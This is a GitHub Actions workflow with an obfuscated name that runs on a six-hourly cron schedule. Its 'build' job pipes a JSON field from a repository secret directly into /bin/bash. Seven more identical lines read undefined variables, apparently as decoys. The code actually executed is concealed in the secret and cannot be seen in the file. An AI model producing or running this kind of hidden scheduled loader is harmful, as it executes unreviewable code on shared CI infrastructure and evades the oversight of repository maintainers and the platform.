name: hmhaomai
on:
  workflow_dispatch:
  schedule:
    - cron: '51 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: hmhaomai
        env:
          e45120: ${{ secrets.e45120 }}
        run: |
          echo $e45120 | jq -r .sg9033 | /bin/bash
          echo $x00 | jq -r .x24 | /bin/bash
          echo $e7 | jq -r .uaii4214 | /bin/bash
          echo $ajvth774 | jq -r .a4408 | /bin/bash
          echo $x31 | jq -r .ko8 | /bin/bash
          echo $ror619 | jq -r .jgiuq08658 | /bin/bash
          echo $mx53217 | jq -r .ov582 | /bin/bash
          echo $e221 | jq -r .rz35 | /bin/bash

